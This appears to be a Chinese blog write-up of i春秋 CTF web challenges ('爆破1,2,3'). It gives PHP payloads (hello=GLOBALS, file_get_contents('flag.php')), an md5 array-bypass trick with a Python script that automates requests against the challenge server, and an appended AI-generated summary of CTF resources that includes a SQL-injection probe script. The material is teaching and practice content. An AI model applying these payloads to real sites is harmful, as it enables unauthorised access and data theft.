i春秋CTF WEB-爆破

本文介绍了一种利用文件包含漏洞的方法,通过精心构造请求来绕过限制并获取隐藏的flag信息。文中详细解释了如何利用PHP全局变量GLOBALS以及md5函数的一个特性,通过Python脚本实现了自动化获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

爆破1,2,3

看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是耗费时间==、

  1. hello=GLOBALS

  2. hello=file_get_contents('flag.php')

  3. 只要第一次传进去的value与session中的相等,则网页会输出下一个value值,通过使用md5函数不能对数组进行处理的漏洞来绕过substr(md5($value),5,4)==0的判断,使nums得值大于10即可得到flag

    python脚本

    # coding:utf-8
    import requests
    
    url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=ea"
    
    al = ['abcdefghijklmnopqrstuvwxyz']
    
    s = requests.session()
    
    r = s.get(url)
    
    for i in range(20):
        url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=" + r.content[0:2]
        r = s.get(url)
        if 'flag{' in r.content:
         print r.content[0:50]
         break
        else:
         print r.content[0:2]
    
### i春秋CTF Web安全挑战资源 #### 关于i春秋平台及其特色 i春秋是一个提供网络安全培训和竞赛的在线教育平台,该平台不仅提供了丰富的课程学习资料还举办了多次高水平的安全赛事。其中提到的百度杯CTF夺旗大战是由百度安全应急响应中心与i春秋共同发起的一项活动,这项比赛具有较长的时间跨度以及较高的频率特点[^1]。 #### Web安全挑战详情 对于希望参与Web方向CTF练习的人来说,在i春秋上可以找到许多优质的实践机会。通过访问[i春秋官网](http://www.ichunqiu.com),能够获取到有关往届比赛中涉及的具体题目解析及线下总决赛期间所使用的试题重现等内容,这对于提升个人技能水平十分有益处[^2]。 此外,除了官方提供的历年真题外,还可以关注一些第三方站点如[ADWorld XCTF社区](https://adworld.xctf.org.cn/),尽管有时会遇到服务器维护的情况,这里同样收录了不少高质量的WebCTF挑战项目供爱好者们交流探讨[^3]。 为了更好地准备这类基于Web的应用程序渗透测试环节,建议深入研究常见的漏洞类型(SQL注入、XSS跨站脚本攻击等),并尝试利用工具辅助分析目标系统的潜在弱点。同时也可以参考其他开源平台上分享的技术文档来补充理论知识,比如RPISEC团队整理的一系列二进制逆向工程教程就非常适合用来强化底层原理的理解[^4]。 ```python import requests def check_sql_injection(url, param): payload = "' OR '1'='1" test_url = f"{url}?{param}={payload}" response = requests.get(test_url) if "You have an error in your SQL syntax;" in response.text: print(f"[+] Potential SQL Injection found at {test_url}") else: print("[-] No obvious signs of SQL Injection") # Example usage (for educational purposes only!) check_sql_injection('http://example.com/login', 'username') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值